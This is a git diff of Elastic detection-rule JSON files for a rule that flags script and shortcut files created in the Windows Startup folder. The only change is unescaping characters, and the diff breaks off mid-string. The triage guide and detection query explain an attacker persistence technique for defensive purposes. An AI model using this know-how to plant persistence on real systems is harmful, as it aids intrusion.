b/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_2.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_104.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_104.json index 72187c19b45..8b853fe33af 100644 --- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_105.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_105.json index 5d2547b8497..7357055f660 100644 --- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_106.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_106.json index 3193d0df995..cd7fb6a12b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_107.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_107.json index 56402e10641..660a677cf17 100644 --- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All 